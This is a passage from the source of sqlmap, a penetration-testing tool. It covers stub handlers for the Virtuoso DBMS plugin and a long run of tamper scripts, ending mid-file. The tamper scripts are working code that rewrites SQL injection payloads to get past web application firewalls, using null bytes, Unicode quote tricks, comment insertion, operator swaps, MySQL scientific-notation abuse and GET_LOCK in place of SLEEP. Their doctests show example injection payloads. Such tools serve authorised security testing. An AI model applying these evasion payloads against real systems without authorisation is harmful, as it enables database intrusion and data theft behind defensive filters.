9 | from lib.core.settings import VIRTUOSO_SYSTEM_DBS
10 | from lib.core.unescaper import unescaper
11 | from plugins.dbms.virtuoso.enumeration import Enumeration
12 | from plugins.dbms.virtuoso.filesystem import Filesystem
13 | from plugins.dbms.virtuoso.fingerprint import Fingerprint
14 | from plugins.dbms.virtuoso.syntax import Syntax
15 | from plugins.dbms.virtuoso.takeover import Takeover
16 | from plugins.generic.misc import Miscellaneous
17 |
18 | class VirtuosoMap(Syntax, Fingerprint, Enumeration, Filesystem, Miscellaneous, Takeover):
19 | """
20 | This class defines Virtuoso methods
21 | """
22 |
23 | def __init__(self):
24 | self.excludeDbsList = VIRTUOSO_SYSTEM_DBS
25 |
26 | for cls in self.__class__.__bases__:
27 | cls.__init__(self)
28 |
29 | unescaper[DBMS.VIRTUOSO] = Syntax.escape
30 |
--------------------------------------------------------------------------------
/plugins/dbms/virtuoso/connector.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 |
3 | """
4 | Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org)
5 | See the file 'LICENSE' for copying permission
6 | """
7 |
8 | from lib.core.exception import SqlmapUnsupportedFeatureException
9 | from plugins.generic.connector import Connector as GenericConnector
10 |
11 | class Connector(GenericConnector):
12 | def connect(self):
13 | errMsg = "on Virtuoso it is not (currently) possible to establish a "
14 | errMsg += "direct connection"
15 | raise SqlmapUnsupportedFeatureException(errMsg)
16 |
--------------------------------------------------------------------------------
/plugins/dbms/virtuoso/filesystem.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 |
3 | """
4 | Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org)
5 | See the file 'LICENSE' for copying permission
6 | """
7 |
8 | from lib.core.exception import SqlmapUnsupportedFeatureException
9 | from plugins.generic.filesystem import Filesystem as GenericFilesystem
10 |
11 | class Filesystem(GenericFilesystem):
12 | def readFile(self, remoteFile):
13 | errMsg = "on Virtuoso it is not possible to read files"
14 | raise SqlmapUnsupportedFeatureException(errMsg)
15 |
16 | def writeFile(self, localFile, remoteFile, fileType=None, forceCheck=False):
17 | errMsg = "on Virtuoso it is not possible to write files"
18 | raise SqlmapUnsupportedFeatureException(errMsg)
19 |
--------------------------------------------------------------------------------
/plugins/dbms/virtuoso/syntax.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 |
3 | """
4 | Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org)
5 | See the file 'LICENSE' for copying permission
6 | """
7 |
8 | from lib.core.convert import getOrds
9 | from plugins.generic.syntax import Syntax as GenericSyntax
10 |
11 | class Syntax(GenericSyntax):
12 | @staticmethod
13 | def escape(expression, quote=True):
14 | """
15 | >>> Syntax.escape("SELECT 'abcdefgh' FROM foobar") == "SELECT CHR(97)||CHR(98)||CHR(99)||CHR(100)||CHR(101)||CHR(102)||CHR(103)||CHR(104) FROM foobar"
16 | True
17 | """
18 |
19 | def escaper(value):
20 | return "||".join("CHR(%d)" % _ for _ in getOrds(value))
21 |
22 | return Syntax._escape(expression, quote, escaper)
23 |
--------------------------------------------------------------------------------
/plugins/dbms/virtuoso/takeover.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 |
3 | """
4 | Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org)
5 | See the file 'LICENSE' for copying permission
6 | """
7 |
8 | from lib.core.exception import SqlmapUnsupportedFeatureException
9 | from plugins.generic.takeover import Takeover as GenericTakeover
10 |
11 | class Takeover(GenericTakeover):
12 | def osCmd(self):
13 | errMsg = "on Virtuoso it is not possible to execute commands"
14 | raise SqlmapUnsupportedFeatureException(errMsg)
15 |
16 | def osShell(self):
17 | errMsg = "on Virtuoso it is not possible to execute commands"
18 | raise SqlmapUnsupportedFeatureException(errMsg)
19 |
20 | def osPwn(self):
21 | errMsg = "on Virtuoso it is not possible to establish an "
22 | errMsg += "out-of-band connection"
23 | raise SqlmapUnsupportedFeatureException(errMsg)
24 |
25 | def osSmb(self):
26 | errMsg = "on Virtuoso it is not possible to establish an "
27 | errMsg += "out-of-band connection"
28 | raise SqlmapUnsupportedFeatureException(errMsg)
29 |
--------------------------------------------------------------------------------
/plugins/generic/__init__.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 |
3 | """
4 | Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org)
5 | See the file 'LICENSE' for copying permission
6 | """
7 |
8 | pass
9 |
--------------------------------------------------------------------------------
/tamper/0eunion.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 |
3 | """
4 | Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org)
5 | See the file 'LICENSE' for copying permission
6 | """
7 |
8 | import re
9 |
10 | from lib.core.enums import PRIORITY
11 |
12 | __priority__ = PRIORITY.HIGHEST
13 |
14 | def dependencies():
15 | pass
16 |
17 | def tamper(payload, **kwargs):
18 | """
19 | Replaces an integer followed by UNION with an integer followed by e0UNION
20 |
21 | Requirement:
22 | * MySQL
23 | * MsSQL
24 |
25 | Notes:
26 | * Reference: https://media.blackhat.com/us-13/US-13-Salgado-SQLi-Optimization-and-Obfuscation-Techniques-Slides.pdf
27 |
28 | >>> tamper('1 UNION ALL SELECT')
29 | '1e0UNION ALL SELECT'
30 | """
31 |
32 | return re.sub(r"(?i)(\d+)\s+(UNION )", r"\g<1>e0\g<2>", payload) if payload else payload
33 |
--------------------------------------------------------------------------------
/tamper/__init__.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 |
3 | """
4 | Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org)
5 | See the file 'LICENSE' for copying permission
6 | """
7 |
8 | pass
9 |
--------------------------------------------------------------------------------
/tamper/apostrophemask.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 |
3 | """
4 | Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org)
5 | See the file 'LICENSE' for copying permission
6 | """
7 |
8 | from lib.core.enums import PRIORITY
9 |
10 | __priority__ = PRIORITY.LOWEST
11 |
12 | def dependencies():
13 | pass
14 |
15 | def tamper(payload, **kwargs):
16 | """
17 | Replaces single quotes (') with their UTF-8 full-width equivalents (e.g. ' -> %EF%BC%87)
18 |
19 | References:
20 | * http://www.utf8-chartable.de/unicode-utf8-table.pl?start=65280&number=128
21 | * https://web.archive.org/web/20130614183121/http://lukasz.pilorz.net/testy/unicode_conversion/
22 | * https://web.archive.org/web/20131121094431/sla.ckers.org/forum/read.php?13,11562,11850
23 | * https://web.archive.org/web/20070624194958/http://lukasz.pilorz.net/testy/full_width_utf/index.phps
24 |
25 | >>> tamper("1 AND '1'='1")
26 | '1 AND %EF%BC%871%EF%BC%87=%EF%BC%871'
27 | """
28 |
29 | return payload.replace('\'', "%EF%BC%87") if payload else payload
30 |
--------------------------------------------------------------------------------
/tamper/apostrophenullencode.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 |
3 | """
4 | Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org)
5 | See the file 'LICENSE' for copying permission
6 | """
7 |
8 | from lib.core.enums import PRIORITY
9 |
10 | __priority__ = PRIORITY.LOWEST
11 |
12 | def dependencies():
13 | pass
14 |
15 | def tamper(payload, **kwargs):
16 | """
17 | Replaces single quotes (') with an illegal double Unicode encoding (e.g. ' -> %00%27)
18 |
19 | >>> tamper("1 AND '1'='1")
20 | '1 AND %00%271%00%27=%00%271'
21 | """
22 |
23 | return payload.replace('\'', "%00%27") if payload else payload
24 |
--------------------------------------------------------------------------------
/tamper/appendnullbyte.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 |
3 | """
4 | Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org)
5 | See the file 'LICENSE' for copying permission
6 | """
7 |
8 | import os
9 |
10 | from lib.core.common import singleTimeWarnMessage
11 | from lib.core.enums import DBMS
12 | from lib.core.enums import PRIORITY
13 |
14 | __priority__ = PRIORITY.LOWEST
15 |
16 | def dependencies():
17 | singleTimeWarnMessage("tamper script '%s' is only meant to be run against %s" % (os.path.basename(__file__).split(".")[0], DBMS.ACCESS))
18 |
19 | def tamper(payload, **kwargs):
20 | """
21 | Appends an (Access) NULL byte character (%00) at the end of payload
22 |
23 | Requirement:
24 | * Microsoft Access
25 |
26 | Notes:
27 | * Useful to bypass weak web application firewalls when the back-end
28 | database management system is Microsoft Access - further uses are
29 | also possible
30 |
31 | Reference: http://projects.webappsec.org/w/page/13246949/Null-Byte-Injection
32 |
33 | >>> tamper('1 AND 1=1')
34 | '1 AND 1=1%00'
35 | """
36 |
37 | return "%s%%00" % payload if payload else payload
38 |
--------------------------------------------------------------------------------
/tamper/base64encode.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 |
3 | """
4 | Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org)
5 | See the file 'LICENSE' for copying permission
6 | """
7 |
8 | from lib.core.convert import encodeBase64
9 | from lib.core.enums import PRIORITY
10 |
11 | __priority__ = PRIORITY.LOW
12 |
13 | def dependencies():
14 | pass
15 |
16 | def tamper(payload, **kwargs):
17 | """
18 | Encodes the entire payload using Base64
19 |
20 | >>> tamper("1' AND SLEEP(5)#")
21 | 'MScgQU5EIFNMRUVQKDUpIw=='
22 | """
23 |
24 | return encodeBase64(payload, binary=False) if payload else payload
25 |
--------------------------------------------------------------------------------
/tamper/commalesslimit.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 |
3 | """
4 | Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org)
5 | See the file 'LICENSE' for copying permission
6 | """
7 |
8 | import os
9 | import re
10 |
11 | from lib.core.common import singleTimeWarnMessage
12 | from lib.core.enums import DBMS
13 | from lib.core.enums import PRIORITY
14 |
15 | __priority__ = PRIORITY.HIGH
16 |
17 | def dependencies():
18 | singleTimeWarnMessage("tamper script '%s' is only meant to be run against %s" % (os.path.basename(__file__).split(".")[0], DBMS.MYSQL))
19 |
20 | def tamper(payload, **kwargs):
21 | """
22 | Replaces (MySQL) instances like 'LIMIT M, N' with 'LIMIT N OFFSET M' counterpart
23 |
24 | Requirement:
25 | * MySQL
26 |
27 | Tested against:
28 | * MySQL 5.0 and 5.5
29 |
30 | >>> tamper('LIMIT 2, 3')
31 | 'LIMIT 3 OFFSET 2'
32 | """
33 |
34 | retVal = payload
35 |
36 | match = re.search(r"(?i)LIMIT\s*(\d+),\s*(\d+)", payload or "")
37 | if match:
38 | retVal = retVal.replace(match.group(0), "LIMIT %s OFFSET %s" % (match.group(2), match.group(1)))
39 |
40 | return retVal
41 |
--------------------------------------------------------------------------------
/tamper/commentbeforeparentheses.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 |
3 | """
4 | Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org)
5 | See the file 'LICENSE' for copying permission
6 | """
7 |
8 | import re
9 |
10 | from lib.core.enums import PRIORITY
11 |
12 | __priority__ = PRIORITY.NORMAL
13 |
14 | def dependencies():
15 | pass
16 |
17 | def tamper(payload, **kwargs):
18 | """
19 | Prepends (inline) comment before parentheses (e.g. ( -> /**/()
20 |
21 | Tested against:
22 | * Microsoft SQL Server
23 | * MySQL
24 | * Oracle
25 | * PostgreSQL
26 |
27 | Notes:
28 | * Useful to bypass web application firewalls that block usage
29 | of function calls
30 |
31 | >>> tamper('SELECT ABS(1)')
32 | 'SELECT ABS/**/(1)'
33 | """
34 |
35 | retVal = payload
36 |
37 | if payload:
38 | retVal = re.sub(r"\b(\w+)\(", r"\g<1>/**/(", retVal)
39 |
40 | return retVal
41 |
--------------------------------------------------------------------------------
/tamper/concat2concatws.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 |
3 | """
4 | Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org)
5 | See the file 'LICENSE' for copying permission
6 | """
7 |
8 | import os
9 |
10 | from lib.core.common import singleTimeWarnMessage
11 | from lib.core.enums import DBMS
12 | from lib.core.enums import PRIORITY
13 |
14 | __priority__ = PRIORITY.HIGHEST
15 |
16 | def dependencies():
17 | singleTimeWarnMessage("tamper script '%s' is only meant to be run against %s" % (os.path.basename(__file__).split(".")[0], DBMS.MYSQL))
18 |
19 | def tamper(payload, **kwargs):
20 | """
21 | Replaces (MySQL) instances like 'CONCAT(A, B)' with 'CONCAT_WS(MID(CHAR(0), 0, 0), A, B)' counterpart
22 |
23 | Requirement:
24 | * MySQL
25 |
26 | Tested against:
27 | * MySQL 5.0
28 |
29 | Notes:
30 | * Useful to bypass very weak and bespoke web application firewalls
31 | that filter the CONCAT() function
32 |
33 | >>> tamper('CONCAT(1,2)')
34 | 'CONCAT_WS(MID(CHAR(0),0,0),1,2)'
35 | """
36 |
37 | if payload:
38 | payload = payload.replace("CONCAT(", "CONCAT_WS(MID(CHAR(0),0,0),")
39 |
40 | return payload
41 |
--------------------------------------------------------------------------------
/tamper/decentities.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 |
3 | """
4 | Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org)
5 | See the file 'LICENSE' for copying permission
6 | """
7 |
8 | from lib.core.enums import PRIORITY
9 |
10 | __priority__ = PRIORITY.LOW
11 |
12 | def dependencies():
13 | pass
14 |
15 | def tamper(payload, **kwargs):
16 | """
17 | HTML encode in decimal (using code points) all characters (e.g. ' -> ')
18 |
19 | >>> tamper("1' AND SLEEP(5)#")
20 | '1' AND SLEEP(5)#'
21 | """
22 |
23 | retVal = payload
24 |
25 | if payload:
26 | retVal = ""
27 | i = 0
28 |
29 | while i < len(payload):
30 | retVal += "&#%s;" % ord(payload[i])
31 | i += 1
32 |
33 | return retVal
34 |
--------------------------------------------------------------------------------
/tamper/dunion.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 |
3 | """
4 | Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org)
5 | See the file 'LICENSE' for copying permission
6 | """
7 |
8 | import os
9 | import re
10 |
11 | from lib.core.common import singleTimeWarnMessage
12 | from lib.core.enums import DBMS
13 | from lib.core.enums import PRIORITY
14 |
15 | __priority__ = PRIORITY.HIGHEST
16 |
17 | def dependencies():
18 | singleTimeWarnMessage("tamper script '%s' is only meant to be run against %s" % (os.path.basename(__file__).split(".")[0], DBMS.ORACLE))
19 |
20 | def tamper(payload, **kwargs):
21 | """
22 | Replaces instances of UNION with DUNION
23 |
24 | Requirement:
25 | * Oracle
26 |
27 | Notes:
28 | * Reference: https://media.blackhat.com/us-13/US-13-Salgado-SQLi-Optimization-and-Obfuscation-Techniques-Slides.pdf
29 |
30 | >>> tamper('1 UNION ALL SELECT')
31 | '1DUNION ALL SELECT'
32 | """
33 |
34 | return re.sub(r"(?i)(\d+)\s+(UNION )", r"\g<1>D\g<2>", payload) if payload else payload
35 |
--------------------------------------------------------------------------------
/tamper/equaltolike.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 |
3 | """
4 | Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org)
5 | See the file 'LICENSE' for copying permission
6 | """
7 |
8 | import re
9 |
10 | from lib.core.enums import PRIORITY
11 |
12 | __priority__ = PRIORITY.HIGHEST
13 |
14 | def dependencies():
15 | pass
16 |
17 | def tamper(payload, **kwargs):
18 | """
19 | Replaces all occurrences of operator equal ('=') with 'LIKE' counterpart
20 |
21 | Tested against:
22 | * Microsoft SQL Server 2005
23 | * MySQL 4, 5.0 and 5.5
24 |
25 | Notes:
26 | * Useful to bypass weak and bespoke web application firewalls that
27 | filter the equal character ('=')
28 | * The LIKE operator is SQL standard. Hence, this tamper script
29 | should work against all (?) databases
30 |
31 | >>> tamper('SELECT * FROM users WHERE id=1')
32 | 'SELECT * FROM users WHERE id LIKE 1'
33 | """
34 |
35 | retVal = payload
36 |
37 | if payload:
38 | retVal = re.sub(r"\s*=\s*", " LIKE ", retVal)
39 |
40 | return retVal
41 |
--------------------------------------------------------------------------------
/tamper/equaltorlike.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 |
3 | """
4 | Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org)
5 | See the file 'LICENSE' for copying permission
6 | """
7 |
8 | import re
9 |
10 | from lib.core.enums import PRIORITY
11 |
12 | __priority__ = PRIORITY.HIGHEST
13 |
14 | def dependencies():
15 | pass
16 |
17 | def tamper(payload, **kwargs):
18 | """
19 | Replaces all occurrences of operator equal ('=') with 'RLIKE' counterpart
20 |
21 | Tested against:
22 | * MySQL 4, 5.0 and 5.5
23 |
24 | Notes:
25 | * Useful to bypass weak and bespoke web application firewalls that
26 | filter the equal character ('=')
27 |
28 | >>> tamper('SELECT * FROM users WHERE id=1')
29 | 'SELECT * FROM users WHERE id RLIKE 1'
30 | """
31 |
32 | retVal = payload
33 |
34 | if payload:
35 | retVal = re.sub(r"\s*=\s*", " RLIKE ", retVal)
36 |
37 | return retVal
38 |
--------------------------------------------------------------------------------
/tamper/escapequotes.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 |
3 | """
4 | Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org)
5 | See the file 'LICENSE' for copying permission
6 | """
7 |
8 | from lib.core.enums import PRIORITY
9 |
10 | __priority__ = PRIORITY.NORMAL
11 |
12 | def dependencies():
13 | pass
14 |
15 | def tamper(payload, **kwargs):
16 | """
17 | Slash escape single and double quotes (e.g. ' -> \')
18 |
19 | >>> tamper('1" AND SLEEP(5)#')
20 | '1\\\\" AND SLEEP(5)#'
21 | """
22 |
23 | return payload.replace("'", "\\'").replace('"', '\\"')
24 |
--------------------------------------------------------------------------------
/tamper/greatest.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 |
3 | """
4 | Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org)
5 | See the file 'LICENSE' for copying permission
6 | """
7 |
8 | import re
9 |
10 | from lib.core.enums import PRIORITY
11 |
12 | __priority__ = PRIORITY.HIGHEST
13 |
14 | def dependencies():
15 | pass
16 |
17 | def tamper(payload, **kwargs):
18 | """
19 | Replaces greater than operator ('>') with 'GREATEST' counterpart
20 |
21 | Tested against:
22 | * MySQL 4, 5.0 and 5.5
23 | * Oracle 10g
24 | * PostgreSQL 8.3, 8.4, 9.0
25 |
26 | Notes:
27 | * Useful to bypass weak and bespoke web application firewalls that
28 | filter the greater than character
29 | * The GREATEST clause is a widespread SQL command. Hence, this
30 | tamper script should work against majority of databases
31 |
32 | >>> tamper('1 AND A > B')
33 | '1 AND GREATEST(A,B+1)=A'
34 | """
35 |
36 | retVal = payload
37 |
38 | if payload:
39 | match = re.search(r"(?i)(\b(AND|OR)\b\s+)([^>]+?)\s*>\s*(\w+|'[^']+')", payload)
40 |
41 | if match:
42 | _ = "%sGREATEST(%s,%s+1)=%s" % (match.group(1), match.group(3), match.group(4), match.group(3))
43 | retVal = retVal.replace(match.group(0), _)
44 |
45 | return retVal
46 |
--------------------------------------------------------------------------------
/tamper/hexentities.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 |
3 | """
4 | Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org)
5 | See the file 'LICENSE' for copying permission
6 | """
7 |
8 | from lib.core.enums import PRIORITY
9 |
10 | __priority__ = PRIORITY.LOW
11 |
12 | def dependencies():
13 | pass
14 |
15 | def tamper(payload, **kwargs):
16 | """
17 | HTML encode in hexadecimal (using code points) all characters (e.g. ' -> 1)
18 |
19 | >>> tamper("1' AND SLEEP(5)#")
20 | '1' AND SLEEP(5)#'
21 | """
22 |
23 | retVal = payload
24 |
25 | if payload:
26 | retVal = ""
27 | i = 0
28 |
29 | while i < len(payload):
30 | retVal += "&#x%s;" % format(ord(payload[i]), "x")
31 | i += 1
32 |
33 | return retVal
34 |
--------------------------------------------------------------------------------
/tamper/htmlencode.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 |
3 | """
4 | Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org)
5 | See the file 'LICENSE' for copying permission
6 | """
7 |
8 | import re
9 |
10 | from lib.core.enums import PRIORITY
11 |
12 | __priority__ = PRIORITY.LOW
13 |
14 | def dependencies():
15 | pass
16 |
17 | def tamper(payload, **kwargs):
18 | """
19 | HTML encode (using code points) all non-alphanumeric characters (e.g. ' -> ')
20 |
21 | >>> tamper("1' AND SLEEP(5)#")
22 | '1' AND SLEEP(5)#'
23 | >>> tamper("1' AND SLEEP(5)#")
24 | '1' AND SLEEP(5)#'
25 | """
26 |
27 | if payload:
28 | payload = re.sub(r"&#(\d+);", lambda match: chr(int(match.group(1))), payload) # NOTE: https://github.com/sqlmapproject/sqlmap/issues/5203
29 | payload = re.sub(r"[^\w]", lambda match: "&#%d;" % ord(match.group(0)), payload)
30 |
31 | return payload
32 |
--------------------------------------------------------------------------------
/tamper/informationschemacomment.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 |
3 | """
4 | Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org)
5 | See the file 'LICENSE' for copying permission
6 | """
7 |
8 | import re
9 |
10 | from lib.core.enums import PRIORITY
11 |
12 | __priority__ = PRIORITY.NORMAL
13 |
14 | def tamper(payload, **kwargs):
15 | """
16 | Add an inline comment (/**/) to the end of all occurrences of (MySQL) "information_schema" identifier
17 |
18 | >>> tamper('SELECT table_name FROM INFORMATION_SCHEMA.TABLES')
19 | 'SELECT table_name FROM INFORMATION_SCHEMA/**/.TABLES'
20 | """
21 |
22 | retVal = payload
23 |
24 | if payload:
25 | retVal = re.sub(r"(?i)(information_schema)\.", r"\g<1>/**/.", payload)
26 |
27 | return retVal
28 |
--------------------------------------------------------------------------------
/tamper/least.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 |
3 | """
4 | Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org)
5 | See the file 'LICENSE' for copying permission
6 | """
7 |
8 | import re
9 |
10 | from lib.core.enums import PRIORITY
11 |
12 | __priority__ = PRIORITY.HIGHEST
13 |
14 | def dependencies():
15 | pass
16 |
17 | def tamper(payload, **kwargs):
18 | """
19 | Replaces greater than operator ('>') with 'LEAST' counterpart
20 |
21 | Tested against:
22 | * MySQL 4, 5.0 and 5.5
23 | * Oracle 10g
24 | * PostgreSQL 8.3, 8.4, 9.0
25 |
26 | Notes:
27 | * Useful to bypass weak and bespoke web application firewalls that
28 | filter the greater than character
29 | * The LEAST clause is a widespread SQL command. Hence, this
30 | tamper script should work against majority of databases
31 |
32 | >>> tamper('1 AND A > B')
33 | '1 AND LEAST(A,B+1)=B+1'
34 | """
35 |
36 | retVal = payload
37 |
38 | if payload:
39 | match = re.search(r"(?i)(\b(AND|OR)\b\s+)([^>]+?)\s*>\s*(\w+|'[^']+')", payload)
40 |
41 | if match:
42 | _ = "%sLEAST(%s,%s+1)=%s+1" % (match.group(1), match.group(3), match.group(4), match.group(4))
43 | retVal = retVal.replace(match.group(0), _)
44 |
45 | return retVal
46 |
--------------------------------------------------------------------------------
/tamper/lowercase.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 |
3 | """
4 | Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org)
5 | See the file 'LICENSE' for copying permission
6 | """
7 |
8 | import re
9 |
10 | from lib.core.data import kb
11 | from lib.core.enums import PRIORITY
12 |
13 | __priority__ = PRIORITY.NORMAL
14 |
15 | def dependencies():
16 | pass
17 |
18 | def tamper(payload, **kwargs):
19 | """
20 | Replaces each keyword character with lower case value (e.g. SELECT -> select)
21 |
22 | Tested against:
23 | * Microsoft SQL Server 2005
24 | * MySQL 4, 5.0 and 5.5
25 | * Oracle 10g
26 | * PostgreSQL 8.3, 8.4, 9.0
27 |
28 | Notes:
29 | * Useful to bypass very weak and bespoke web application firewalls
30 | that has poorly written permissive regular expressions
31 |
32 | >>> tamper('INSERT')
33 | 'insert'
34 | """
35 |
36 | retVal = payload
37 |
38 | if payload:
39 | for match in re.finditer(r"\b[A-Za-z_]+\b", retVal):
40 | word = match.group()
41 |
42 | if word.upper() in kb.keywords:
43 | retVal = retVal.replace(word, word.lower())
44 |
45 | return retVal
46 |
--------------------------------------------------------------------------------
/tamper/misunion.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 |
3 | """
4 | Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org)
5 | See the file 'LICENSE' for copying permission
6 | """
7 |
8 | import os
9 | import re
10 |
11 | from lib.core.common import singleTimeWarnMessage
12 | from lib.core.enums import DBMS
13 | from lib.core.enums import PRIORITY
14 |
15 | __priority__ = PRIORITY.HIGHEST
16 |
17 | def dependencies():
18 | singleTimeWarnMessage("tamper script '%s' is only meant to be run against %s" % (os.path.basename(__file__).split(".")[0], DBMS.MYSQL))
19 |
20 | def tamper(payload, **kwargs):
21 | """
22 | Replaces instances of UNION with -.1UNION
23 |
24 | Requirement:
25 | * MySQL
26 |
27 | Notes:
28 | * Reference: https://raw.githubusercontent.com/y0unge/Notes/master/SQL%20Injection%20WAF%20Bypassing%20shortcut.pdf
29 |
30 | >>> tamper('1 UNION ALL SELECT')
31 | '1-.1UNION ALL SELECT'
32 | >>> tamper('1" UNION ALL SELECT')
33 | '1"-.1UNION ALL SELECT'
34 | """
35 |
36 | return re.sub(r"(?i)\s+(UNION )", r"-.1\g<1>", payload) if payload else payload
37 |
--------------------------------------------------------------------------------
/tamper/ord2ascii.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 |
3 | """
4 | Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org)
5 | See the file 'LICENSE' for copying permission
6 | """
7 |
8 | import re
9 |
10 | from lib.core.enums import PRIORITY
11 |
12 | __priority__ = PRIORITY.HIGHEST
13 |
14 | def dependencies():
15 | pass
16 |
17 | def tamper(payload, **kwargs):
18 | """
19 | Replaces ORD() occurences with equivalent ASCII() calls
20 | Requirement:
21 | * MySQL
22 | >>> tamper("ORD('42')")
23 | "ASCII('42')"
24 | """
25 |
26 | retVal = payload
27 |
28 | if payload:
29 | retVal = re.sub(r"(?i)\bORD\(", "ASCII(", payload)
30 |
31 | return retVal
32 |
--------------------------------------------------------------------------------
/tamper/schemasplit.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 |
3 | """
4 | Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org)
5 | See the file 'LICENSE' for copying permission
6 | """
7 |
8 | import re
9 |
10 | from lib.core.enums import PRIORITY
11 |
12 | __priority__ = PRIORITY.HIGHEST
13 |
14 | def dependencies():
15 | pass
16 |
17 | def tamper(payload, **kwargs):
18 | """
19 | Splits FROM schema identifiers (e.g. 'testdb.users') with whitespace (e.g. 'testdb 9.e.users')
20 |
21 | Requirement:
22 | * MySQL
23 |
24 | Notes:
25 | * Reference: https://media.blackhat.com/us-13/US-13-Salgado-SQLi-Optimization-and-Obfuscation-Techniques-Slides.pdf
26 |
27 | >>> tamper('SELECT id FROM testdb.users')
28 | 'SELECT id FROM testdb 9.e.users'
29 | """
30 |
31 | return re.sub(r"(?i)( FROM \w+)\.(\w+)", r"\g<1> 9.e.\g<2>", payload) if payload else payload
32 |
--------------------------------------------------------------------------------
/tamper/scientific.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 |
3 | """
4 | Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org)
5 | See the file 'LICENSE' for copying permission
6 | """
7 |
8 | import re
9 |
10 | from lib.core.enums import PRIORITY
11 |
12 | __priority__ = PRIORITY.HIGHEST
13 |
14 | def dependencies():
15 | pass
16 |
17 | def tamper(payload, **kwargs):
18 | """
19 | Abuses MySQL scientific notation
20 |
21 | Requirement:
22 | * MySQL
23 |
24 | Notes:
25 | * Reference: https://www.gosecure.net/blog/2021/10/19/a-scientific-notation-bug-in-mysql-left-aws-waf-clients-vulnerable-to-sql-injection/
26 |
27 | >>> tamper('1 AND ORD(MID((CURRENT_USER()),7,1))>1')
28 | '1 AND ORD 1.e(MID((CURRENT_USER 1.e( 1.e) 1.e) 1.e,7 1.e,1 1.e) 1.e)>1'
29 | """
30 |
31 | if payload:
32 | payload = re.sub(r"[),.*^/|&]", r" 1.e\g<0>", payload)
33 | payload = re.sub(r"(\w+)\(", lambda match: "%s 1.e(" % match.group(1) if not re.search(r"(?i)\A(MID|CAST|FROM|COUNT)\Z", match.group(1)) else match.group(0), payload) # NOTE: MID and CAST don't work for sure
34 |
35 | return payload
36 |
--------------------------------------------------------------------------------
/tamper/sleep2getlock.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 |
3 | """
4 | Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org)
5 | See the file 'LICENSE' for copying permission
6 | """
7 |
8 | from lib.core.data import kb
9 | from lib.core.enums import PRIORITY
10 |
11 | __priority__ = PRIORITY.HIGHEST
12 |
13 | def dependencies():
14 | pass
15 |
16 | def tamper(payload, **kwargs):
17 | """
18 | Replaces instances like 'SLEEP(5)' with (e.g.) "GET_LOCK('ETgP',5)"
19 |
20 | Requirement:
21 | * MySQL
22 |
23 | Tested against:
24 | * MySQL 5.0 and 5.5
25 |
26 | Notes:
27 | * Useful to bypass very weak and bespoke web application firewalls
28 | that filter the SLEEP() and BENCHMARK() functions
29 |
30 | * Reference: https://zhuanlan.zhihu.com/p/35245598
31 |
32 | >>> tamper('SLEEP(5)') == "GET_LOCK('%s',5)" % kb.aliasName
33 | True
34 | """
35 |
36 | if payload:
37 | payload = payload.replace("SLEEP(", "GET_LOCK('%s'," % kb.aliasName)
38 |
39 | return payload
40 |
--------------------------------------------------------------------------------
/tamper/sp_password.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 |
3 | """
